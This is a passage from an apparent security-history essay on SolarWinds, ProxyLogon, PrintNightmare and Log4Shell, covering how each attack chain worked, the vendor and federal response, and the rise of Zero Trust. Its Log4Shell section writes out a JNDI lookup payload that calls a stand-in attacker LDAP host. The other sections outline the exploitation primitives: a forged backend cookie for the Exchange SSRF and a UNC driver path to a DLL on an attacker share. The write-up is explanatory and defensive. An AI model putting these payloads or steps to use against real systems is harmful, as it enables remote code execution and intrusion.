disguised as Orion telemetry C2->>Customer: TEARDROP or Raindrop second-stage loader Customer->>ADFS: Lateral movement, extract token-signing key ADFS->>ADFS: Attacker forges SAMLResponse offline ADFS->>M365: Golden SAML token for chosen identity M365->>M365: Federated trust accepts forged assertion Note over Customer,M365: Approximately 100 targeted follow-on victims out of 18,000 SUNBURST recipients

Blast radius. SolarWinds' December 14 Form 8-K stated that fewer than 18,000 customers installed the trojanized updates between March and June 2020 [@solarwinds-sec-edgar]. Brad Smith's February 23 Senate testimony placed the count of follow-on victims pursued via lateral movement at fewer than 100 [@senate-intel-2021-02-23]. On April 15, 2021, the White House formally attributed the operation to the Russian Foreign Intelligence Service (SVR), with coincident sanctions and the expulsion of ten Russian diplomats [@wh-fact-sheet-svr-attribution]. The activity cluster Mandiant had originally tracked as UNC2452 was merged into APT29 in May 2022 [@mandiant-apt29-merge]; Microsoft's Nobelium designation was retired on April 18, 2023 in favor of "Midnight Blizzard" under the new weather-themed actor-naming scheme [@ms-actor-naming-2023].

The renaming pile-up matters operationally. Detection rules written against "UNC2452" in early 2021, against "APT29" after May 2022, and against "Midnight Blizzard" after April 2023 all reference the same actor cluster, but tooling and queries that anchor on a single name miss the others. Mandiant's SUNBURST countermeasure repository preserves the original IOCs [@mandiant-sunburst-countermeasures-gh].

Vendor response and federal action. CISA's January 8, 2021 Cybersecurity Advisory AA21-008A was the first federal advisory to name forged authentication tokens, federated identity bypass, and cloud-side persistence as a coherent detection priority [@cisa-aa21-008a]. CISA released an open-source detection tool, Sparrow, with the advisory. SolarWinds shipped Orion 2020.2.1 HF 2 as the hotfix sequence. The April 13, 2021 Department of Justice action against ProxyLogon web shells (covered in the next subsection) and the April 15 White House attribution and sanctions package effectively closed the public-sector response cycle within four months of the December 13 disclosure.

In his 1983 Turing Award lecture, published in *Communications of the ACM* in August 1984, Ken Thompson described a self-referential modification to a compiler that produced a backdoor in any program the compiler subsequently compiled, including future copies of the compiler itself [@thompson-1984-acm, @thompson-nakamoto-reading]. The construction has a property that is easy to state and hard to confront: no amount of source-code auditing reveals the backdoor, because the backdoor is not in any source code. It is in the compiler's behavior.

SUNBURST is not the same construction. The compromise was at the build server rather than the compiler, and the attacker's code was added to the artifact rather than inserted by a self-replicating modification. The relevant similarity is architectural rather than mechanical. In both cases the trust anchor (the compiler in Thompson's lecture, the publisher's code-signing certificate in SUNBURST) was doing exactly what it was specified to do. The auditor of a backdoored binary cannot find the backdoor in the source. The customer of a backdoored vendor cannot find the backdoor in the signature. The chain of evidence is intact at the level the verifier is checking; the failure is at a level the verifier was never specified to check.

Thompson's closing sentence -- "You can't trust code that you did not totally create yourself" -- reads in 1984 as a thought experiment and in 2020 as an operational claim about the build pipelines of every software vendor in the Authenticode trust list.

Key idea: Signed code from your vendor is not trustworthy if your vendor's build pipeline is compromised. Authenticode signs the publisher's binary; it does not sign the build that produced the binary. The eighteen thousand SUNBURST recipients did exactly what their endpoints were specified to do.

If the entry was a signed update from a trusted vendor, the entry was inside the perimeter before the perimeter was tested. The second incident showed what happens when the entry is the perimeter.

3.2 HAFNIUM / ProxyLogon: The Front-End That Pre-Authenticated for the Back-End

Two independent researcher pipelines converged on the same Exchange vulnerability chain within days of each other in January 2021. Volexity's Steven Adair and team observed exploitation activity against customer Exchange Server deployments as early as January 6, 2021 -- a date Volexity later revised to January 3, 2021 in their March 8 update to "Operation Exchange Marauder" [@volexity-exchange-marauder]. Both January dates are earliest-observed exploitation dates, not detection or zero-day-identification dates; the chain was already in operator hands when Volexity's customer-side incident-response telemetry surfaced it. DEVCORE's Cheng-Da "Orange Tsai" Tsai arrived at the same chain independently through code review and reported it to MSRC on January 5 [@orange-tsai-proxylogon]. Both reports landed at Microsoft Security Response Center; both researchers held the disclosure as MSRC worked on a patch. On March 2, 2021 -- a Tuesday, but not a Patch Tuesday -- Microsoft shipped out-of-band updates for all supported Exchange Server versions [@msft-hafnium-blog].

The exploit chain. The audit-correct shape of the chain is three CVEs, not four. CVE-2021-26855 is a server-side request forgery in the Exchange Server front-end that allows an unauthenticated attacker to send requests to the back-end as if the requester were Exchange itself [@nvd-cve-2021-26855]. CVE-2021-27065 is a post-authentication arbitrary file write that the attacker reaches via the SSRF, allowing an attacker-chosen ASPX web shell to be written to a server-controlled directory [@tenable-exchange-zd]. The shell then executes under the Exchange process identity, which is SYSTEM. A separate file-write primitive (CVE-2021-26858) provides a parallel path to the same web-shell drop after authentication.

A class of vulnerability in which an attacker induces a server to issue requests on the attacker's behalf, typically to internal resources that the attacker could not reach directly. CVE-2021-26855 was an SSRF in the Exchange Server front-end (the Client Access role): a forged X-AnonResource-Backend cookie caused the front-end to proxy attacker-supplied requests to the Exchange back-end with the proxy's own authentication context, bypassing the Exchange authentication boundary entirely.

CVE-2021-26857 sits in a parallel position. It is an insecure deserialization in Exchange's Unified Messaging service that yields code execution as SYSTEM to any authenticated user [@tenable-exchange-zd]. It does not require the SSRF step. Treating ProxyLogon as a single linear chain of four CVEs is the common simplification; the audit-correct framing is three CVEs in the linear SSRF-to-web-shell path and one separate authenticated RCE primitive in a parallel position.

Note: The "four chained zero-days" shorthand collapses two distinct attack-class shapes and obscures the SSRF-as-load-bearing-primitive observation. The chain that proxies through 26855 does not pass through 26857; 26857 was an independent RCE primitive available to attackers who already held any Exchange-authenticated identity, which is a different threat-model class from the pre-auth SSRF.

flowchart TD A[Unauthenticated attacker] --> B[CVE-2021-26855 SSRF on front-end] B --> C[Forged backend-auth cookie] C --> D[CVE-2021-27065 or CVE-2021-26858 arbitrary file write] D --> E[ASPX web shell on disk] E --> F[SYSTEM-level RCE] subgraph Parallel G[Authenticated user] --> H[CVE-2021-26857 Unified Messaging deserialization] H --> F end

Blast radius. Pre-patch numbers come from two separate primaries. Brian Krebs reported on March 5, 2021 that "at least 30,000" U.S. organizations had been compromised [@krebs-hafnium-march5]. Bloomberg's March 7 reporting placed the worldwide figure at "as many as 60,000" organizations [@krebs-hafnium-march5]. After Microsoft's March 2 patch shipped, the chain was widely weaponized by additional actor groups -- LuckyMouse, Tick, Calypso, Winnti, and others -- per ESET's March 10, 2021 enumeration of at least ten APT groups exploiting the same chain [@eset-exchange-10apt-2021]; the aggregate count of post-patch compromised servers ran toward 250,000 in the following weeks per Krebs's contemporaneous reporting on hundreds-of-thousands-class Exchange server compromise globally [@krebs-hafnium-march5]. That 250,000 figure is widely cited but it aggregates post-patch indiscriminate exploitation; it is not a pre-patch numerator. Microsoft attributed the original campaign to a Chinese state-sponsored actor it named HAFNIUM, later renamed Silk Typhoon under the weather-themed scheme in April 2023 [@msft-hafnium-blog, @ms-actor-naming-2023].

HAFNIUM became Silk Typhoon at the same April 18, 2023 rename pass that made Nobelium into Midnight Blizzard [@ms-actor-naming-2023]. Microsoft's threat-actor naming history matters because mid-cycle renames can fragment detection coverage; rules keyed on the old name will silently stop matching new advisories.

Vendor response and federal action. Beyond the March 2 out-of-band patches, Microsoft released a one-click mitigation tool on March 8 and the Exchange On-premises Mitigation Tool on March 15. The Department of Justice and FBI then took an unprecedented step.

On April 13, 2021, the U.S. Department of Justice announced that the FBI had executed a court-authorized operation under Rule 41 of the Federal Rules of Criminal Procedure to access compromised on-premises Exchange servers in the United States, copy the attacker-installed web shells, and remove them -- without the system owners' prior consent or notification [@doj-fbi-rule41-pr, @hunton-fbi-rule41]. Owners were notified afterward.

The legal mechanism is worth pausing on. Rule 41, as amended in 2016, allows a single magistrate judge to authorize searches of computers whose location is unknown or whose location is in five or more judicial districts. The April 13 operation was the first major use of that authority to remediate third-party systems at scale, rather than to investigate. The precedent matters: every subsequent federal incident response that contemplates active intervention on private systems sits in the shadow of this order.

The architectural lesson is at the level of the product design. Exchange Server's front-end and back-end were specified to communicate over an authenticated trust boundary inside a single deployment. CVE-2021-26855 made the front-end act as the attacker's proxy into the back-end; the SSRF did not bypass the trust boundary, it relocated to its server-side end and walked through it. On-premises server fleets that organizations control are still on the public internet, and the entry-point class is "the front-end proxy that pre-authenticates traffic for the back-end."

If the supply-chain class compromised the signed code on the endpoint, the on-premises server class compromised the boundary readers thought was between the endpoint and the internet. The third incident compromised the boundary inside the perimeter.

3.3 PrintNightmare: The Legacy SYSTEM Service on Every Domain Controller

On Patch Tuesday, June 8, 2021, Microsoft shipped a fix for CVE-2021-1675 [@msrc-cve-2021-1675] and labelled the vulnerability as an Elevation of Privilege in the Windows Print Spooler. Two weeks later -- with no announcement, no out-of-band advisory, and no community notification -- the MSRC entry was edited to add Remote Code Execution to the impact classification. Sangfor's Zhiniang Peng (@edwardzpeng) and Xuefeng Li (@lxf02942370) had reported the EoP behavior [@cube0x0-cve-2021-1675-gh]; the silent reclassification suggested an RCE primitive existed in the same surface that the June 8 patch had not closed. On June 29, believing the chain was now patched, Sangfor pushed a proof-of-concept to GitHub [@cube0x0-cve-2021-1675-gh, @cert-cc-vu-383432]. The repository was taken down within hours; copies preserved in forks (notably @cube0x0's Impacket port) became the artifact-of-record.

CERT/CC's Will Dormann reproduced the chain the next day and published Vulnerability Note VU#383432 with a sentence that the Windows operations community spent the rest of the week re-reading [@cert-cc-vu-383432]:

While Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT protect against public exploits that may refer to PrintNightmare or CVE-2021-1675. -- Will Dormann, CERT/CC VU#383432, June 30, 2021

On July 1, Microsoft assigned a new CVE -- CVE-2021-34527 -- for the broader RCE surface and acknowledged that it was "similar but distinct" from CVE-2021-1675 [@msrc-cve-2021-34527]. Out-of-band patches followed on July 6-7 for every supported Windows release, including unusual coverage for Windows 7 and Server 2008. On July 13, CISA issued Emergency Directive 21-04 ordering federal civilian agencies to apply the patches immediately and to disable or restrict the Print Spooler on Domain Controllers as a standing mitigation [@cisa-ed-21-04]. Microsoft followed with KB5005010 on July 14, documenting the supplementary Point-and-Print hardening required to close the residual surface [@kb5005010].

The Sangfor commit was preserved in forks because GitHub's fork model maintains each fork as an independent copy of the upstream repository's commit object graph, retained regardless of subsequent upstream deletion [@github-docs-about-forks]. The @cube0x0 fork [@cube0x0-cve-2021-1675-gh] became the de facto preserved artifact-of-record, with Sangfor's original authorship credited in the README. The story is a study in the asymmetry of disclosure timing: a vendor can take down a repository, but cannot retract the bytes that have already left.

PrintNightmare had a prior. Thirteen months earlier, on May 12, 2020, Alex Ionescu and Yarden Shafir published "PrintDemon" against the same service, the same SYSTEM context, and the same fundamental design assumption that PrintNightmare would expose more deeply [@printdemon-windows-internals]. PrintDemon (CVE-2020-1048) exploited the Spooler's printer-port abstraction: a printer port name was an opaque string the Spooler treated as a destination, and an unprivileged user could set the port name to an arbitrary file path. The Spooler would then write the print job bytes to that path -- with SYSTEM privileges -- producing arbitrary file write as SYSTEM through three PowerShell one-liners (Add-Printer, set port, Out-Printer) that any standard user could run. SafeBreach Labs' Peleg Hadar and Tomer Bar independently reported the same surface, reverse-engineered the May Microsoft patch, and presented related Spooler work at Black Hat USA 2020 [@cyberscoop-safebreach-spooler].

The design flaw is the same in both cases: the Spooler's RPC interface trusts caller-supplied strings (port names in PrintDemon; driver-package paths in PrintNightmare) without enforcing caller-side permissions on the file paths they resolve to. PrintDemon's primitive was arbitrary file write as SYSTEM. PrintNightmare's primitive was arbitrary code execution as SYSTEM via DLL load. The May 2020 to June-July 2021 progression is the canonical "expand the primitive" vulnerability-research arc -- same service, same trust assumption, incrementally more dangerous primitive.

Dimension	PrintDemon (CVE-2020-1048)	PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
Disclosure	May 12, 2020 Patch Tuesday	June 8 (EoP), July 1 (RCE), July 6-7 OOB
Researchers	Ionescu, Shafir; SafeBreach Hadar, Bar	Sangfor Peng, Li; CERT/CC Dormann; @cube0x0
Vulnerable RPC primitive	Printer-port name accepts arbitrary path	`RpcAddPrinterDriverEx` loads driver from UNC
Primitive class	Arbitrary file write as SYSTEM	Arbitrary code execution as SYSTEM
Caller privilege required	Standard local user	Authenticated domain user
Domain Controller impact	Local file-write only	Remote SYSTEM RCE on every DC running Spooler
Disclosure model	Coordinated, Patch Tuesday	Coordinated, then accidental PoC, then OOB

PrintNightmare is the wider case of an attack-class PrintDemon had already opened. The architectural lesson is that a vulnerability researcher who finds any primitive in a SYSTEM-privileged Windows RPC service should be treated as a signal that the broader surface needs review, not as a point-fix candidate.

The exploit chain. The Windows Print Spooler service (spoolsv.exe) runs as SYSTEM on every Windows machine and is enabled by default, including on Domain Controllers. The Spooler exposes two Remote Procedure Call interfaces (MS-RPRN and MS-PAR) used by clients to query printers, submit jobs, and install drivers. RpcAddPrinterDriverEx is the RPC method that installs a new printer driver. As shipped before July 2021, the method accepted a driver path specified as a UNC, fetched the driver file from that path, and loaded it into the Spooler process -- which runs as SYSTEM. An authenticated domain user could call RpcAddPrinterDriverEx against any reachable Spooler with the driver path pointing to an attacker-controlled share, and obtain SYSTEM execution in the target Spooler process. Domain Controllers running Spooler by default meant any authenticated domain user obtained SYSTEM on every DC. Domain compromise followed.

The MS-RPRN Print System Remote Protocol is the canonical Windows RPC interface for printer management. Per the Microsoft Open Specifications Appendix B Product Behavior, the earliest applicable Windows version is Windows NT 3.1 (1993). It exposes interfaces for printer enumeration, job management, and driver installation. Because Spooler hosts the interface and runs as SYSTEM, every reachable Spooler is a potential SYSTEM-level RPC endpoint. PrintNightmare exploited the `RpcAddPrinterDriverEx` method specifically; the related `RpcAsyncAddPrinterDriver` method is the asynchronous variant Dormann documented as the alternative entry point. flowchart LR A[Domain user with credentials] --> B[RpcAddPrinterDriverEx call] B --> C[Print Spooler on Domain Controller] C --> D[Spooler fetches driver from UNC path] D --> E[Attacker SMB share with malicious DLL] E --> C C --> F[DLL loaded into spoolsv.exe as SYSTEM] F --> G[SYSTEM execution on Domain Controller] G --> H[Domain compromise] PrintNightmare turned on a vendor practice that the disclosure community had not previously named as a primitive: a security advisory whose classification changed without notice. The June 8 publication of CVE-2021-1675 said EoP. The mid-June revision said EoP and RCE. There was no out-of-band advisory, no email to affected administrators, no public callout. The reclassification was visible only to people who happened to revisit the MSRC page.

Sangfor's accidental PoC was, in a real sense, an artifact of the reclassification. The researchers believed the patched June 8 chain was the same chain they had reported and that the published patch covered their proof-of-concept. The change-without-notice meant the patch they were testing was incomplete and the demonstration they were publishing was live. The CERT/CC follow-up demonstrated the same point from the verifier side: a reproducer ran against a fully patched Windows Server 2019 Domain Controller and got SYSTEM.

The post-PrintNightmare disclosure-norms debate spent the next two years working through the implications. Should reclassifications trigger a fresh CVE assignment so the change has its own visible identifier? Should advisories carry change logs analogous to those on RFCs? Should vendors notify researchers credited for one CVE when the classification is broadened? MSRC's current practice has moved toward more transparent change tracking; the 2021 silent reclassification remains the canonical counterexample.

The architectural lesson is that the Windows attack surface still includes services dating from Windows NT 3.1, designed for a single-domain office LAN, running with SYSTEM-equivalent privileges on every Domain Controller by default. A silent vendor reclassification from EoP to RCE is itself an adversarial signal -- it is what leaks the technique.

Note: The defensible architecture for legacy Windows RPC surfaces is to constrain who can reach them and what privileges the host process holds when they are reached. Disabling Print Spooler on Domain Controllers (per CISA ED 21-04 [@cisa-ed-21-04]) and enabling the Point-and-Print restrictions in KB5005010 [@kb5005010] are the immediate hardening; the long-arc architectural answer is the same one that closes the ProxyLogon class, namely treating any service exposing RPC at SYSTEM as an internet-facing surface even when the network topology says otherwise.

If the supply-chain class compromised the signature and the on-premises server class compromised the perimeter, PrintNightmare compromised the inside of the trust boundary -- the Domain Controller itself. The fourth incident showed that even the boundary of the application stack was not a boundary.

3.4 Log4Shell: The Universal Library and the Transitive Dependency Graph

On November 24, 2021, Chen Zhaojun of Alibaba Cloud Security emailed the Apache Software Foundation with a vulnerability in Log4j 2.x: any message that the application logged, if it contained a ${jndi:...} substitution sequence, would trigger an outbound JNDI lookup [@log4j-apache-security]. On December 9, the bug surfaced in Minecraft Java Edition community channels -- which mattered because Minecraft's chat handler logs the messages players send. Within hours, LunaSec's Free Wortley, Chris Thompson, and Forrest Allison published the canonical writeup and coined the name "Log4Shell" [@lunasec-log4shell-gh]. Apache shipped Log4j 2.15.0 on December 10. CVE-2021-44228 was scored CVSS 10.0 [@nvd-cve-2021-44228]. On December 11, CISA Director Jen Easterly's official statement called Log4Shell a "severe risk" and "an urgent challenge to network defenders" [@cisa-easterly-statement-2021-12-11]. Two days later, on the CISA-convened national industry call, she went further: "one of the most serious I've seen in my entire career, if not the most serious" [@cyberscoop-easterly-2021-12-13].

CVE-2021-44228 was the moment "what versions of what library are in my fleet" stopped being a procurement question and became a federal-advisory question. -- Synthesis from CISA AA21-356A and the Apache Log4j security history

Why a Java library belongs in a Windows series. Log4Shell is not a Windows vulnerability. The bug is in Apache Log4j, a Java logging library, and the impact lands on any process that runs the affected Log4j versions and logs untrusted input. It belongs in this series because the most enterprise-impactful exploitation in the Windows-server-fleet population ran through Java applications hosted on Windows: Tomcat and JBoss application servers, VMware vCenter and Horizon, Atlassian Confluence and Jamf Pro on Windows hosts, Cisco enterprise products, ElasticSearch, and dozens of internal Java services running on Windows Server with embedded JREs. Microsoft's December 11, 2021 Security Blog post (with rolling updates through January 2022) documented Log4Shell exploitation against Windows-hosted Java fleets and the Defender for Endpoint detections built on top [@ms-log4j-guidance]; CISA's joint advisory covered the cross-platform exposure explicitly [@cisa-aa21-356a].

A Java API, first standardized in 1999, that provides a uniform interface for naming and directory services. JNDI is the abstraction layer between Java application code and back-end directory implementations -- LDAP, RMI, DNS, CORBA, and others. The Log4j 2.x message-pattern substitution feature evaluated `${jndi:...}` lookups by calling JNDI to resolve the named resource. If the JNDI URL pointed at an attacker-controlled LDAP server, the attacker could return a Java class reference, which the JVM would then download and instantiate -- executing arbitrary code in the application process.

The exploit chain. Any logged string that contained a ${jndi:ldap://attacker.example/payload} substitution caused Log4j to call out to the attacker's LDAP server. The server returned a Java class reference; the JVM dereferenced it, loaded the class over HTTP, and instantiated it. Arbitrary code execution followed under the JVM's identity. The exploitation primitive was extraordinarily compact: any place an attacker could get an attacker-controlled string into a logged event -- HTTP User-Agent, X-Forwarded-For, Minecraft chat, application form fields, log-event JSON, the username field of a failed authentication -- was an entry point.

sequenceDiagram participant Att as Attacker participant App as Java application on Windows participant Log4j as Log4j 2.x logger participant LDAP as Attacker LDAP server Att->>App: HTTP request, header contains JNDI lookup string App->>Log4j: logger.info incoming-request line Log4j->>Log4j: Message-pattern substitution evaluates the lookup Log4j->>LDAP: JNDI LDAP query to attacker host LDAP->>Log4j: Reference to attacker-hosted Java class Log4j->>LDAP: HTTP fetch of the class file LDAP->>Log4j: Bytecode payload Log4j->>App: JVM instantiates the class, runs constructor as the JVM identity Note over App: SYSTEM-level RCE on Windows hosts where the JVM ran as SYSTEM

The Minecraft Java Edition leak vector mattered both for impact and for visibility. Java Edition's chat handler logs the messages players send. A player who typed a JNDI lookup into chat could trigger remote code execution on any server -- including the player's own Minecraft client -- that processed the chat through Log4j. The fastest public confirmation of the bug came not from a security researcher but from screenshots of Minecraft chat sessions, and the discovery propagated through the gaming community before the security industry had its first advisory out.

Blast radius. CVSS 10.0 is the maximum score the framework allows. At the same December 13 industry call, officials placed Log4Shell as affecting "hundreds of millions of devices" [@cyberscoop-easterly-2021-12-13]; the formal eight-agency joint advisory AA21-356A followed on December 22 [@cisa-aa21-356a]. The number was never an audited count; it was an order-of-magnitude estimate that combined Java's installed base (the JDK shipping by the time of disclosure was on every major enterprise platform) with Log4j's adoption across the Java community (Log4j 2 is a transitive dependency of thousands of enterprise packages, often pulled in by chained dependency graphs that the application owner never explicitly chose). What the figure communicated -- accurately -- was that no one knew how many Log4j 2 instances existed in production.

Patch cascade. Log4j 2.15.0 (December 10) closed CVE-2021-44228 but did not fully eliminate the JNDI lookup primitive. 2.16.0 (December 14) closed CVE-2021-45046 by removing message lookups entirely. 2.17.0 (December 18) closed CVE-2021-45105, a denial-of-service in the same substitution path. 2.17.1 (December 28) closed CVE-2021-44832, an arbitrary-code-execution variant. The architectural lesson includes the "first patch did not actually fix it" story -- four CVEs and four patch releases over nineteen days to fully close a single bug class. Backports to the older 2.3.x and 2.12.x branches continued into January 2022.

A formal, machine-readable inventory of the components -- libraries, packages, embedded code, and dependencies -- that make up a software artifact. The two dominant standards are CycloneDX (OWASP, ECMA-424) [@cyclonedx-home] and SPDX (Linux Foundation, ISO/IEC 5962:2021) [@spdx-home]. EO 14028 made SBOM provision a federal procurement requirement [@eo-14028]; the SBOM debate the four incidents accelerated is whether SBOM data is most useful as a *prevention* tool (refusing to install software whose components fail policy) or as an *incident response* tool (answering "are we exposed?" in hours rather than weeks). Log4Shell was the first incident where the IR utility was operationally tested at scale.

Key idea: Universal libraries with deep transitive-dependency footprints are the new universal attack surface. "What versions of what library are in my fleet" was a question the typical enterprise could not answer in December 2021, and that gap is what accelerated SBOM from a policy document to operational tooling.

Four incidents in thirteen months. Four assumptions broken. The next section asks what the prior-decade controls were actually doing that whole time.

4. Why Prior Art Did Not Catch Any of the Four

If the prior decade had quietly elevated four assumptions to invariants, the prior-decade controls had been quietly enforcing them. Here is what each one was actually doing during 2020-2021.

Endpoint EDR alone. The 2018-2020 industry consensus was that endpoint detection and response, plus a SIEM, plus a security operations centre, plus periodic threat hunting, constituted tractable defense-in-depth. The model worked against malware. It did not work against SUNBURST, because the binary that executed was the one EDR was specified to trust: signed by SolarWinds, on the approved publisher list, distributed via the customer's own patch-management pipeline. It did not work against ProxyLogon either, because the entry was an unauthenticated HTTPS request to a publicly reachable Exchange front-end, and the resulting web shell was an ASPX file served by w3wp.exe (the IIS worker process) -- not a malware drop. By the time EDR had behavioral telemetry on either case, the post-compromise phase was several steps along. Microsoft's own Digital Defense Report acknowledged the posture in plainer language: the industry had become competent at finding attackers after the fact, not at stopping them at first execution [@mddr-2021-specific].

Perimeter VPN and Network Access Control. The defense-in-depth posture of the 2010s assumed the inside of the corporate network was a higher-trust zone than the outside, accessed via a VPN concentrator on the boundary. BeyondCorp's 2014-2017 publication sequence had already named the assumption as architecturally wrong: the December 2014 Ward and Beyer paper [@ward-beyer-2014-usenix], the Spring 2016 Osborn et al. design-to-deployment paper [@beyondcorp-osborn-2016], the Winter 2016 Cittadini et al. access-proxy paper [@beyondcorp-cittadini-2016], the Summer 2017 Peck et al. migration paper [@beyondcorp-peck-2017], and the Fall 2017 Escobedo et al. user-experience paper [@beyondcorp-escobedo-2017] together document Google's transition off the privileged-intranet assumption and onto the public internet. SolarWinds did the empirical version of the same argument. The attacker was already inside the privileged-intranet zone, by virtue of a trusted vendor's signed update being a legitimate inhabitant of that zone. Anything the perimeter VPN was enforcing was being enforced against a population that did not include the attacker.

Patch Tuesday as the universal cadence. Microsoft's Patch Tuesday cadence -- the second Tuesday of every month, published at 10 AM Pacific Time -- was the assumed coordination point for the entire Windows defense industry [@ms-release-cycle]. Detection engineering, change management, scheduled-maintenance windows, and operator workflow all keyed on that monthly rhythm. Between March and August 2021, Microsoft issued multiple out-of-band emergency Exchange and Windows updates [@msft-hafnium-blog, @kb5005010]. The cadence's predictability -- the very property that scaled it to a global operator base -- was the property that made out-of-band patches feel like emergencies. The cadence broke under load not because the model was wrong but because the model assumed the load would not arrive in a sustained burst.

The clustering of out-of-band patches matters as a measured cadence-failure signal. Patch Tuesday absorbs routine load; it does not absorb a clustering of pre-auth RCEs in Exchange Server and Print Spooler within four months. The 2021 cluster was a stress test on the cadence itself, and one of the post-incident operator complaints (from administrators of Domain Controllers required to reboot for the July 6-7 PrintNightmare OOB) was that the cadence's monthly rhythm had been training operations teams for a different threat model than the one 2021 produced.

Note: All three prior-art positions -- endpoint EDR, perimeter VPN, monthly patch cadence -- assumed the trust boundary was knowable. EDR knew which binaries were trusted (the signed ones). The VPN knew where the boundary was (between the corporate LAN and the public internet). Patch Tuesday knew when updates would arrive (the second Tuesday of every month). The 2020-2023 cluster proved each boundary was something other than where the prior decade had placed it. The pivot was already on the shelf; it had just not yet become operative.

5. Zero Trust Was Already on the Shelf

There is a startling chronology fact here. NIST Special Publication 800-207, Zero Trust Architecture [@nist-sp-800-207], was published in August 2020. The Mandiant SUNBURST disclosure was December 13, 2020. Zero Trust was not a response to SolarWinds. It was the vocabulary already on the shelf when SolarWinds needed it.

The intellectual chain. Zero Trust is not a single document but a tradition with a thirteen-year arc. Four named milestones structure that arc.

In September 2010, John Kindervag, then at Forrester Research, published "No More Chewy Centers: Introducing the Zero Trust Model of Information Security" [@kindervag-2010-forrester, @isc2-15-years-zt, @illumio-15-years-zt]. The framing was network-segmentation-first and rhetorically unforgettable:

"Information security professionals must eliminate the soft chewy center by making security ubiquitous throughout the network, not just at the perimeter." -- John Kindervag, Forrester Research, "No More Chewy Centers," September 14, 2010

In December 2014, Rory Ward and Betsy Beyer of Google published "BeyondCorp: A New Approach to Enterprise Security" in USENIX ;login: magazine [@ward-beyer-2014-usenix]. The paper documented Google's transition from a privileged-intranet model to one in which every internal application was reachable on the public internet and every access decision was made on the basis of authenticated user and managed-device identity. A series of further BeyondCorp papers through 2017 worked out the engineering details. BeyondCorp is a production implementation of Zero Trust principles; it is not "the framework," and Ward and Beyer do not claim it is.

Between 2017 and 2018, Forrester elaborated the original framing into Zero Trust eXtended (ZTX), a seven-pillar taxonomy, and Gartner introduced CARTA -- Continuous Adaptive Risk and Trust Assessment -- as a complementary continuous-evaluation framing.ZTX gave the framework a procurement-friendly seven-pillar map; CARTA reframed access decisions as continuous rather than session-initial. Neither produced a complete architectural specification, which is the gap NIST SP 800-207 was published to fill in August 2020.

In August 2020, NIST published SP 800-207 [@nist-sp-800-207]. Authored by Scott Rose, Oliver Borchert, Stu Mitchell, and Sean Connelly, SP 800-207 synthesized Kindervag's framing, BeyondCorp's worked example, ZTX's taxonomy, CARTA's continuous evaluation, and federal Trusted Internet Connections (TIC) guidance into a vendor-neutral architecture. The architectural primitives the document names -- Policy Decision Point, Policy Enforcement Point, Policy Engine, and Policy Administrator -- become the load-bearing vocabulary for every subsequent Zero Trust treatment.

An architectural orientation that refuses the assumption of a privileged inside network and decides every access on the basis of authenticated identity, device posture, and contextual signals at the moment of access. The term was coined by John Kindervag at Forrester in September 2010 [@kindervag-2010-forrester]. BeyondCorp [@ward-beyer-2014-usenix] is Google's production implementation, not the framework. NIST SP 800-207 [@nist-sp-800-207] is the vendor-neutral architectural specification. The Microsoft three-principle formulation ("Verify Explicitly, Use Least Privilege, Assume Breach" [@ms-zt-overview]) is *one* specialization of an older tradition; it is not the original. The two load-bearing primitives in NIST SP 800-207's Zero Trust architecture [@nist-sp-800-207]. The Policy Decision Point is the component that evaluates an access request against policy, user identity, device posture, and contextual signals and produces a decision. The Policy Enforcement Point is the component that intercepts the request and enforces the decision the PDP returns. In Microsoft's stack, Conditional Access [@ms-conditional-access] is the PDP for cloud-application access decisions; the resource (Exchange Online, SharePoint, a custom app) is the PEP. The PDP and PEP can be co-located or remote; the architectural distinction is the one that matters. A common simplification reads NIST SP 800-207 as having "formalized BeyondCorp." This is the wrong shape of the chain.

NIST SP 800-207 explicitly references BeyondCorp as one production implementation of Zero Trust principles, alongside other implementations and prior architectural work. The document does not claim to be a formalization of BeyondCorp; it claims to be a vendor-neutral synthesis of multiple traditions, of which BeyondCorp is the most-cited production exemplar. The naming sequence -- "Zero Trust" 2010 by Kindervag, "BeyondCorp" 2014 by Ward and Beyer, "Zero Trust Architecture" 2020 by Rose et al. -- preserves the distinction.

The reason this matters is that "BeyondCorp" as a brand has become shorthand inside the Google-aligned engineering community for "the Zero Trust thing," while in the federal procurement community the relevant artifact is SP 800-207 itself. When the OMB M-22-09 federal Zero Trust strategy memo [@omb-m-22-09] cites a canonical reference, it cites SP 800-207, not BeyondCorp. The Microsoft three-principle formulation cites SP 800-207. CISA's Zero Trust Maturity Model cites SP 800-207. BeyondCorp is the worked example; SP 800-207 is the contract.

flowchart LR A[Kindervag Forrester 2010, No More Chewy Centers] --> B[Google BeyondCorp 2014 to 2017, USENIX login] B --> C[Forrester ZTX 2017 to 2018] A --> C A --> D[Gartner CARTA 2017 to 2018] C --> E[NIST SP 800-207 August 2020] D --> E B --> E E --> F[Microsoft three-principle 2021 to 2022] E --> G[EO 14028 May 2021 and OMB M-22-09 January 2022] G --> H[CISA ZTMM v2.0 April 2023] E --> H

The Microsoft three-principle adoption -- Verify Explicitly, Use Least Privilege, Assume Breach -- runs through Microsoft Build 2022's Zero Trust keynote programming and through the Microsoft Learn Zero Trust overview that codifies the framing as Microsoft documentation [@ms-zt-overview]. Federal adoption became binding in OMB M-22-09 on January 26, 2022 [@omb-m-22-09], which required Federal Civilian Executive Branch agencies to align with SP 800-207 and the CISA Zero Trust Maturity Model by end of FY24, with phishing-resistant multi-factor authentication as the identity-pillar baseline.

Key idea: Zero Trust is not a 2020 invention, and the SolarWinds-HAFNIUM-PrintNightmare-Log4Shell clustering is not what created the architecture. The vocabulary was already on the shelf in August 2020. The thirteen-month incident clustering is what made the vocabulary operative for the Windows industry -- because the incident clustering invalidated four separate assumptions simultaneously, and only an architectural pivot at the perimeter-trust level addressed all four.

The vocabulary existed in August 2020. The receipt arrived in December 2020. Section 6 walks the four Windows-side primitives that operationalized the vocabulary at scale.

6. The Defensive Layer That Shipped at Scale (2021-2023)

Vocabulary becomes architecture only when something ships. Here are the four Windows-side primitives that operationalized Zero Trust between 2021 and 2023.

6.1 Microsoft Pluton: The Hardware Response to a Supply-Chain Class

